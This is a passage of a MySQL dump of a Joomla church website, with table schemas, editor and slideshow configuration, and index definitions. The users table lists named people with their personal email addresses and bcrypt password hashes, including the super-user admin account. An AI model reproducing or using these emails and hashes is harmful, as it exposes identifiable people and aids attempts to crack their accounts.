(19, 'JEV_PACKAGE_TITLE', 'extension', 'https://www.jevents.net/updates/-bGlmZW9hc2lzaW50ZXJuYXRpb25hbGNodXJjaC5vcmc=/pkg_jevents-update-3.4.48.xml', 1, 1569127901, '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_update_sites_extensions`
--

CREATE TABLE `y57u5_update_sites_extensions` (
  `update_site_id` int(11) NOT NULL DEFAULT '0',
  `extension_id` int(11) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Links extensions to update sites';

--
-- Dumping data for table `y57u5_update_sites_extensions`
--

INSERT INTO `y57u5_update_sites_extensions` (`update_site_id`, `extension_id`) VALUES
(1, 700),
(3, 802),
(4, 28),
(5, 10470),
(11, 10279),
(13, 10470),
(14, 10544),
(15, 10542),
(15, 10556),
(15, 10563),
(15, 10564),
(17, 10557),
(18, 10538),
(19, 10275);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_usergroups`
--

CREATE TABLE `y57u5_usergroups` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `parent_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Adjacency List Reference Id',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_usergroups`
--

INSERT INTO `y57u5_usergroups` (`id`, `parent_id`, `lft`, `rgt`, `title`) VALUES
(1, 0, 1, 18, 'Public'),
(2, 1, 8, 15, 'Registered'),
(3, 2, 9, 14, 'Author'),
(4, 3, 10, 13, 'Editor'),
(5, 4, 11, 12, 'Publisher'),
(6, 1, 4, 7, 'Manager'),
(7, 6, 5, 6, 'Administrator'),
(8, 1, 16, 17, 'Super Users'),
(9, 1, 2, 3, 'Guest');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_users`
--

CREATE TABLE `y57u5_users` (
  `id` int(11) NOT NULL,
  `name` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `username` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `password` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `block` tinyint(4) NOT NULL DEFAULT '0',
  `sendEmail` tinyint(4) DEFAULT '0',
  `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `activation` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset',
  `resetCount` int(11) NOT NULL DEFAULT '0' COMMENT 'Count of password resets since lastResetTime',
  `otpKey` varchar(1000) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Two factor authentication encrypted keys',
  `otep` varchar(1000) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'One time emergency passwords',
  `requireReset` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Require user to reset password on next login'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_users`
--

INSERT INTO `y57u5_users` (`id`, `name`, `username`, `email`, `password`, `block`, `sendEmail`, `registerDate`, `lastvisitDate`, `activation`, `params`, `lastResetTime`, `resetCount`, `otpKey`, `otep`, `requireReset`) VALUES
(196, 'Lifeoasis', 'admin', 'banjiadewoye@gmail.com', '$2y$10$WLN4ui8HruiEsHlEzAWV7OOekto5KWZRa4AoU3XUgU9hh3WnYeK3y', 0, 1, '2016-10-24 17:09:07', '2019-09-24 11:52:25', '0', '{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}', '0000-00-00 00:00:00', 0, '', '', 0),
(199, 'Rev Olusola Ayodele Areogun', 'ayodele', 'lifeoasischurch@gmail.com', '$2y$10$EymwToaQWaqWNz5bRr1Y1O0JHIJNJOz2geLXer1wBN3UGzhxC021u', 0, 0, '2016-12-31 18:47:00', '0000-00-00 00:00:00', '', '{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}', '0000-00-00 00:00:00', 0, '', '', 0),
(200, 'Rev (Mrs) Oyenike Areogun', 'oyenike', 'oyenikeareogun@gmail.com', '$2y$10$HrQaFKOBTHzYgQagLebvAOllz2ySc35xjJO4DMSPZVY9jBOV6nRhS', 0, 0, '2017-03-23 16:20:24', '0000-00-00 00:00:00', '', '{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}', '0000-00-00 00:00:00', 0, '', '', 0),
(201, 'smedia1', 'smedia1', 'lifeoasischurch@gmail1.com', '$2y$10$TYVozZHxjDMi0Cu5U0yEgeQFxS2JJRDgVTKfZKhi7/FIPy.iKHUNm', 0, 0, '2019-08-27 14:09:47', '2019-09-03 17:08:29', '', '{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"timezone\":\"\"}', '0000-00-00 00:00:00', 0, '', '', 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_user_keys`
--

CREATE TABLE `y57u5_user_keys` (
  `id` int(10) UNSIGNED NOT NULL,
  `user_id` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL,
  `token` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `series` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `invalid` tinyint(4) NOT NULL,
  `time` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `uastring` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_user_notes`
--

CREATE TABLE `y57u5_user_notes` (
  `id` int(10) UNSIGNED NOT NULL,
  `user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `catid` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `subject` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `body` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int(10) UNSIGNED NOT NULL,
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_user_profiles`
--

CREATE TABLE `y57u5_user_profiles` (
  `user_id` int(11) NOT NULL,
  `profile_key` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `profile_value` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Simple user profile storage table';

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_user_usergroup_map`
--

CREATE TABLE `y57u5_user_usergroup_map` (
  `user_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__users.id',
  `group_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__usergroups.id'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_user_usergroup_map`
--

INSERT INTO `y57u5_user_usergroup_map` (`user_id`, `group_id`) VALUES
(196, 8),
(199, 1),
(199, 2),
(199, 3),
(199, 4),
(199, 5),
(199, 6),
(199, 7),
(199, 9),
(200, 2),
(200, 3),
(200, 4),
(200, 5),
(201, 3);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_utf8_conversion`
--

CREATE TABLE `y57u5_utf8_conversion` (
  `converted` tinyint(4) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_utf8_conversion`
--

INSERT INTO `y57u5_utf8_conversion` (`converted`) VALUES
(2);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_viewlevels`
--

CREATE TABLE `y57u5_viewlevels` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rules` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded access control.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_viewlevels`
--

INSERT INTO `y57u5_viewlevels` (`id`, `title`, `ordering`, `rules`) VALUES
(1, 'Public', 0, '[1]'),
(2, 'Registered', 2, '[6,2,8]'),
(3, 'Special', 3, '[6,3,8]'),
(5, 'Guest', 1, '[9]'),
(6, 'Super Users', 4, '[8]');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_wf_profiles`
--

CREATE TABLE `y57u5_wf_profiles` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `description` text NOT NULL,
  `users` text NOT NULL,
  `types` text NOT NULL,
  `components` text NOT NULL,
  `area` tinyint(3) NOT NULL,
  `device` varchar(255) NOT NULL,
  `rows` text NOT NULL,
  `plugins` text NOT NULL,
  `published` tinyint(3) NOT NULL,
  `ordering` int(11) NOT NULL,
  `checked_out` tinyint(3) NOT NULL,
  `checked_out_time` datetime NOT NULL,
  `params` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_wf_profiles`
--

INSERT INTO `y57u5_wf_profiles` (`id`, `name`, `description`, `users`, `types`, `components`, `area`, `device`, `rows`, `plugins`, `published`, `ordering`, `checked_out`, `checked_out_time`, `params`) VALUES
(1, 'Default', 'Default Profile for all users', '', '3,4,5,6,8,7', '', 0, 'desktop,tablet,phone', 'help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,blockquote,formatselect,styleselect,removeformat,cleanup;fontselect,fontsizeselect,fontcolor,spacer,clipboard,indent,outdent,lists,sub,sup,textcase,charmap,hr;directionality,fullscreen,print,searchreplace,spacer,table,style,xhtmlxtras;visualaid,visualchars,visualblocks,nonbreaking,anchor,unlink,link,imgmanager,spellchecker,article', 'formatselect,styleselect,cleanup,fontselect,fontsizeselect,fontcolor,clipboard,lists,textcase,charmap,hr,directionality,fullscreen,print,searchreplace,table,style,xhtmlxtras,visualchars,visualblocks,nonbreaking,anchor,link,imgmanager,spellchecker,article,spellchecker,article,browser,contextmenu,inlinepopups,media,preview,source', 1, 1, 0, '0000-00-00 00:00:00', ''),
(2, 'Front End', 'Sample Front-end Profile', '', '3,4,5', '', 1, 'desktop,tablet,phone', 'help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,formatselect,styleselect;clipboard,searchreplace,indent,outdent,lists,cleanup,charmap,removeformat,hr,sub,sup,textcase,nonbreaking,visualchars,visualblocks;fullscreen,print,visualaid,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article', 'charmap,contextmenu,inlinepopups,help,clipboard,searchreplace,fullscreen,preview,print,style,textcase,nonbreaking,visualchars,visualblocks,xhtmlxtras,imgmanager,anchor,link,spellchecker,article,lists,formatselect,styleselect,hr', 0, 2, 0, '0000-00-00 00:00:00', ''),
(3, 'Blogger', 'Simple Blogging Profile', '', '3,4,5,6,8,7', '', 0, 'desktop,tablet,phone', 'bold,italic,strikethrough,lists,blockquote,spacer,justifyleft,justifycenter,justifyright,spacer,link,unlink,imgmanager,article,spellchecker,fullscreen,kitchensink;formatselect,styleselect,underline,justifyfull,clipboard,removeformat,charmap,indent,outdent,undo,redo,help', 'link,imgmanager,article,spellchecker,fullscreen,kitchensink,clipboard,contextmenu,inlinepopups,lists,formatselect,styleselect,textpattern', 0, 3, 0, '0000-00-00 00:00:00', '{\"editor\":{\"toggle\":\"0\"}}'),
(4, 'Mobile', 'Sample Mobile Profile', '', '3,4,5,6,8,7', '', 0, 'tablet,phone', 'undo,redo,spacer,bold,italic,underline,formatselect,spacer,justifyleft,justifycenter,justifyfull,justifyright,spacer,fullscreen,kitchensink;styleselect,lists,spellchecker,article,link,unlink', 'fullscreen,kitchensink,spellchecker,article,link,inlinepopups,lists,formatselect,styleselect,textpattern', 0, 4, 0, '0000-00-00 00:00:00', '{\"editor\":{\"toolbar_theme\":\"mobile\",\"resizing\":\"0\",\"resize_horizontal\":\"0\",\"resizing_use_cookie\":\"0\",\"toggle\":\"0\",\"links\":{\"popups\":{\"default\":\"\",\"jcemediabox\":{\"enable\":\"0\"},\"window\":{\"enable\":\"0\"}}}}}'),
(5, 'Markdown', 'Sample Markdown Profile', '', '6,7,3,4,5,8', '', 0, 'desktop,tablet,phone', 'fullscreen,justifyleft,justifycenter,justifyfull,justifyright,link,unlink,imgmanager,styleselect', 'fullscreen,link,imgmanager,styleselect,inlinepopups,media,textpattern', 0, 5, 0, '0000-00-00 00:00:00', '{\"editor\":{\"toolbar_theme\":\"mobile\"}}');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_widgetkit_widget`
--

CREATE TABLE `y57u5_widgetkit_widget` (
  `id` int(11) NOT NULL,
  `type` varchar(255) NOT NULL,
  `style` varchar(255) NOT NULL,
  `name` varchar(255) NOT NULL,
  `content` longtext NOT NULL,
  `created` datetime NOT NULL,
  `modified` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_widgetkit_widget`
--

INSERT INTO `y57u5_widgetkit_widget` (`id`, `type`, `style`, `name`, `content`, `created`, `modified`) VALUES
(2, 'slideshow', 'default', 'slider#2', '{\"type\":\"slideshow\",\"id\":2,\"name\":\"slider#2\",\"settings\":{\"style\":\"default\",\"autoplay\":1,\"interval\":5000,\"width\":945,\"height\":637,\"duration\":100,\"index\":0,\"order\":\"default\",\"navigation\":0,\"buttons\":1,\"slices\":20,\"animated\":\"kenburns\",\"caption_animation_duration\":500},\"style\":\"default\",\"items\":{\"4f8db447989f7\":{\"title\":\"Slide_2\",\"content\":\"<img src=\\\"images\\/demo\\/gallery\\/column_1\\/2.jpg\\\" width=\\\"945\\\" height=\\\"637\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"},\"4f8db3db59595\":{\"title\":\"slide_1\",\"content\":\"<img src=\\\"images\\/demo\\/gallery\\/column_1\\/1.jpg\\\" width=\\\"945\\\" height=\\\"637\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"},\"4f8db46673482\":{\"title\":\"slide_3\",\"content\":\"<img src=\\\"images\\/demo\\/gallery\\/column_1\\/3.jpg\\\" width=\\\"945\\\" height=\\\"637\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"}}}', '2012-04-17 18:20:59', '2012-07-11 09:28:15'),
(3, 'slideshow', 'default', 'slider#3', '{\"type\":\"slideshow\",\"id\":3,\"name\":\"slider#3\",\"settings\":{\"style\":\"default\",\"autoplay\":1,\"interval\":5000,\"width\":658,\"height\":252,\"duration\":100,\"index\":0,\"order\":\"default\",\"navigation\":1,\"buttons\":1,\"slices\":20,\"animated\":\"kenburns\",\"caption_animation_duration\":500},\"style\":\"default\",\"items\":{\"4f8db3db59595\":{\"title\":\"slide_1\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/small\\/blog_full_img_1.jpg\\\" width=\\\"658\\\" height=\\\"252\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"},\"4f8db447989f7\":{\"title\":\"Slide_2\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/small\\/blog_full_img_2.jpg\\\" width=\\\"658\\\" height=\\\"252\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"},\"4f8db46673482\":{\"title\":\"slide_3\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/small\\/blog_full_img_3.jpg\\\" width=\\\"658\\\" height=\\\"252\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"},\"4f8dd77c49972\":{\"title\":\"slide_4\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/small\\/blog_full_img_4.jpg\\\" width=\\\"658\\\" height=\\\"252\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"}}}', '2012-04-17 18:26:30', '2012-07-11 09:27:30'),
(4, 'slideshow', 'default', 'slider#4', '{\"type\":\"slideshow\",\"id\":4,\"name\":\"slider#4\",\"settings\":{\"style\":\"default\",\"autoplay\":1,\"interval\":5000,\"width\":658,\"height\":252,\"duration\":500,\"index\":0,\"order\":\"default\",\"navigation\":1,\"buttons\":1,\"slices\":20,\"animated\":\"randomFx\",\"caption_animation_duration\":500},\"style\":\"default\",\"items\":{\"4f8db3db59595\":{\"title\":\"slide_1\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/small\\/blog_full_img_1.jpg\\\" width=\\\"658\\\" height=\\\"252\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"},\"4f8db447989f7\":{\"title\":\"Slide_2\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/small\\/blog_full_img_2.jpg\\\" width=\\\"658\\\" height=\\\"252\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"},\"4f8db46673482\":{\"title\":\"slide_3\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/small\\/blog_full_img_3.jpg\\\" width=\\\"658\\\" height=\\\"252\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"},\"4f8dd77c49972\":{\"title\":\"slide_4\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/small\\/blog_full_img_4.jpg\\\" width=\\\"658\\\" height=\\\"252\\\" \\/>\",\"caption\":\"Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua metus vitae gravida dignissim. \"}}}', '2012-04-17 20:55:56', '2012-07-11 09:27:43'),
(9, 'slideshow', 'default', 'Home-page Slider', '{\"type\":\"slideshow\",\"id\":9,\"name\":\"Home-page Slider\",\"settings\":{\"style\":\"default\",\"autoplay\":1,\"interval\":15000,\"width\":1280,\"height\":427,\"duration\":500,\"index\":0,\"order\":\"default\",\"navigation\":1,\"buttons\":1,\"slices\":30,\"animated\":\"scale\",\"caption_animation_duration\":500},\"style\":\"default\",\"items\":{\"502ca3ded454f\":{\"title\":\"Trip to the Holy land this fall\",\"content\":\"<img src=\\\"images\\/2017mercy.png\\\" alt=\\\"alt-icon\\\" width=\\\"1280\\\" height=\\\"427\\\" \\/>\",\"caption\":\"\"},\"50542862a22fa\":{\"title\":\"Arise and Shine\",\"content\":\"<img src=\\\"images\\/demo\\/crimson\\/background\\/slide8.jpg\\\" alt=\\\"alt-icon\\\" width=\\\"1280\\\" height=\\\"427\\\" \\/>\",\"caption\":\"<h2>Arise and Shine<\\/h2><p>Bible reading for today. Arise, shine; for thy light is come, and the glory of the LORD is risen upon thee.  <\\/p><span class=\\\"title\\\">Isaiah 60: 1<\\/span>\"},\"4f8e710e8ff99\":{\"title\":\"Worship Live Concert!\",\"content\":\"<img src=\\\"images\\/demo\\/crimson\\/background\\/slide4.jpg\\\" alt=\\\"alt-icon\\\" width=\\\"1280\\\" height=\\\"427\\\" \\/>\",\"caption\":\"\"},\"5810b7d1d55f0\":{\"title\":\"Forgivenness\",\"content\":\"<img src=\\\"images\\/demo\\/crimson\\/background\\/slide8.jpg\\\" alt=\\\"alt-icon\\\" width=\\\"1280\\\" height=\\\"427\\\" \\/>\",\"caption\":\"<h2>Worship Live Concert!<\\/h2><p>All roads will lead to one stage. One crowd and one ticket per person. One band will be performing. A concert you don\'t want to miss<\\/p><span class=\\\"title\\\">29th - 30th September<\\/span>\"}}}', '2012-04-18 08:54:03', '2016-12-31 23:38:38'),
(24, 'slideshow', '', '', '{\"type\":\"slideshow\",\"id\":null,\"name\":null,\"settings\":null,\"style\":null,\"items\":[]}', '2016-10-25 15:46:22', '2016-10-25 15:46:22'),
(22, 'slideshow', 'default', 'Client Testimonials', '{\"type\":\"slideshow\",\"id\":22,\"name\":\"Client Testimonials\",\"settings\":{\"style\":\"default\",\"autoplay\":1,\"interval\":10000,\"width\":1280,\"height\":\"auto\",\"duration\":500,\"index\":0,\"order\":\"default\",\"navigation\":1,\"buttons\":1,\"slices\":20,\"animated\":\"scroll\",\"caption_animation_duration\":500},\"style\":\"default\",\"items\":{\"51bf74d79cccf\":{\"title\":\"Steve Reiff\",\"content\":\"[testimonial author=\\\"Steve Reiff\\\" title=\\\"<span class=\\\"jobtitle\\\">Head of marketing, Mcdonalds<\\/span>\\\"]Mauris vehicula vestibulum justo. Cum <strong>sociis natoque penatibus<\\/strong> et magnis dis parturient montes, nascetur ridiculus mus. Nulla pulvinar est. Integer urna. Pellentesque pulvinar. Ut ultricies diam vel est convallis non auctor dui scelerisque. Quisque at erat sem. [\\/testimonial]\",\"caption\":\"\"},\"51bf750086da1\":{\"title\":\"Tony Fadell\",\"content\":\"<p>[testimonial author=\\\"Tony Fadell\\\" title=\\\"Ex. Chief Architect, apple Inc\\\"]Mauris vehicula vestibulum justo. Cum <strong>sociis natoque penatibus<\\/strong> et magnis dis parturient montes, nascetur ridiculus mus. Nulla pulvinar est. Integer urna. Pellentesque pulvinar. Ut ultricies diam vel est convallis non auctor dui scelerisque. Quisque at erat sem. [\\/testimonial]<\\/p>\",\"caption\":\"\"},\"51bf75092fa65\":{\"title\":\"John Doe\",\"content\":\"<p>[testimonial author=\\\"John Doe\\\" title=\\\"<span class=\\\"jobtitle\\\">Head of Sales, envato<\\/span>\\\"]Mauris vehicula vestibulum justo. Cum <strong>sociis natoque penatibus<\\/strong> et magnis dis parturient montes, nascetur ridiculus mus. Nulla pulvinar est. Integer urna. Pellentesque pulvinar. Ut ultricies diam vel est convallis non auctor dui scelerisque. Quisque at erat sem. [\\/testimonial]<\\/p>\",\"caption\":\"\"}}}', '2013-06-17 20:43:15', '2013-06-20 09:30:54'),
(20, 'slideshow', 'home-slide', 'Slider module position', '{\"type\":\"slideshow\",\"id\":20,\"name\":\"Slider module position\",\"settings\":{\"style\":\"home-slide\",\"autoplay\":1,\"interval\":10000,\"width\":1280,\"height\":427,\"duration\":500,\"index\":0,\"order\":\"default\",\"navigation\":1,\"buttons\":1,\"slices\":30,\"animated\":\"scale\",\"caption_animation_duration\":500},\"style\":\"home-slide\",\"items\":{\"4f8e7095cfe68\":{\"title\":\"This is the slider position\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/images\\/_blank.jpg\\\" alt=\\\"slide\\\" width=\\\"1280\\\" height=\\\"427\\\" \\/>\",\"caption\":\"<h2>This is the slider position.<\\/h2><p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut sed do eiusmod tempor incididunt ut labore<\\/p><a class=\\\"button right\\\">read more<\\/a>\"},\"4f8e712fef7b2\":{\"title\":\"Hello. I\'m Matt.\",\"content\":\"<img src=\\\"images\\/demo\\/slide\\/images\\/_blank.jpg\\\" alt=\\\"slide\\\" width=\\\"1280\\\" height=\\\"427\\\" \\/>\",\"caption\":\"<h2>This is another image.<\\/h2><p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut sed do eiusmod tempor incididunt ut labore<\\/p><a class=\\\"button right\\\">read more<\\/a>\"}}}', '2012-09-08 14:07:22', '2013-06-20 09:09:03');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `y57u5_action_logs`
--
ALTER TABLE `y57u5_action_logs`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_user_id` (`user_id`),
  ADD KEY `idx_user_id_logdate` (`user_id`,`log_date`),
  ADD KEY `idx_user_id_extension` (`user_id`,`extension`),
  ADD KEY `idx_extension_item_id` (`extension`,`item_id`);

--
-- Indexes for table `y57u5_action_logs_extensions`
--
ALTER TABLE `y57u5_action_logs_extensions`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_action_logs_users`
--
ALTER TABLE `y57u5_action_logs_users`
  ADD PRIMARY KEY (`user_id`),
  ADD KEY `idx_notify` (`notify`);

--
-- Indexes for table `y57u5_action_log_config`
--
ALTER TABLE `y57u5_action_log_config`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_assets`
--
ALTER TABLE `y57u5_assets`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `idx_asset_name` (`name`),
  ADD KEY `idx_lft_rgt` (`lft`,`rgt`),
  ADD KEY `idx_parent_id` (`parent_id`);

--
-- Indexes for table `y57u5_associations`
--
ALTER TABLE `y57u5_associations`
  ADD PRIMARY KEY (`context`,`id`),
  ADD KEY `idx_key` (`key`);

--
-- Indexes for table `y57u5_banners`
--
ALTER TABLE `y57u5_banners`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_state` (`state`),
  ADD KEY `idx_own_prefix` (`own_prefix`),
  ADD KEY `idx_metakey_prefix` (`metakey_prefix`(100)),
  ADD KEY `idx_banner_catid` (`catid`),
  ADD KEY `idx_language` (`language`);

--
-- Indexes for table `y57u5_banner_clients`
--
ALTER TABLE `y57u5_banner_clients`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_own_prefix` (`own_prefix`),
  ADD KEY `idx_metakey_prefix` (`metakey_prefix`(100));

--
-- Indexes for table `y57u5_banner_tracks`
--
ALTER TABLE `y57u5_banner_tracks`
  ADD PRIMARY KEY (`track_date`,`track_type`,`banner_id`),
  ADD KEY `idx_track_date` (`track_date`),
  ADD KEY `idx_track_type` (`track_type`),
  ADD KEY `idx_banner_id` (`banner_id`);

--
-- Indexes for table `y57u5_categories`
--
ALTER TABLE `y57u5_categories`
  ADD PRIMARY KEY (`id`),
  ADD KEY `cat_idx` (`extension`,`published`,`access`),
  ADD KEY `idx_access` (`access`),
  ADD KEY `idx_checkout` (`checked_out`),
  ADD KEY `idx_left_right` (`lft`,`rgt`),
  ADD KEY `idx_language` (`language`),
  ADD KEY `idx_path` (`path`(100)),
  ADD KEY `idx_alias` (`alias`(100));

--
-- Indexes for table `y57u5_cjlib_config`
--
ALTER TABLE `y57u5_cjlib_config`
  ADD PRIMARY KEY (`config_name`);

--
-- Indexes for table `y57u5_contact_details`
--
ALTER TABLE `y57u5_contact_details`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_access` (`access`),
  ADD KEY `idx_checkout` (`checked_out`),
  ADD KEY `idx_state` (`published`),
  ADD KEY `idx_catid` (`catid`),
  ADD KEY `idx_createdby` (`created_by`),
  ADD KEY `idx_featured_catid` (`featured`,`catid`),
  ADD KEY `idx_language` (`language`),
  ADD KEY `idx_xreference` (`xreference`);

--
-- Indexes for table `y57u5_content`
--
ALTER TABLE `y57u5_content`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_access` (`access`),
  ADD KEY `idx_checkout` (`checked_out`),
  ADD KEY `idx_state` (`state`),
  ADD KEY `idx_catid` (`catid`),
  ADD KEY `idx_createdby` (`created_by`),
  ADD KEY `idx_featured_catid` (`featured`,`catid`),
  ADD KEY `idx_language` (`language`),
  ADD KEY `idx_xreference` (`xreference`),
  ADD KEY `idx_alias` (`alias`(191));

--
-- Indexes for table `y57u5_contentitem_tag_map`
--
ALTER TABLE `y57u5_contentitem_tag_map`
  ADD UNIQUE KEY `uc_ItemnameTagid` (`type_id`,`content_item_id`,`tag_id`),
  ADD KEY `idx_tag_type` (`tag_id`,`type_id`),
  ADD KEY `idx_date_id` (`tag_date`,`tag_id`),
  ADD KEY `idx_core_content_id` (`core_content_id`);

--
-- Indexes for table `y57u5_content_frontpage`
--
ALTER TABLE `y57u5_content_frontpage`
  ADD PRIMARY KEY (`content_id`);

--
-- Indexes for table `y57u5_content_rating`
--
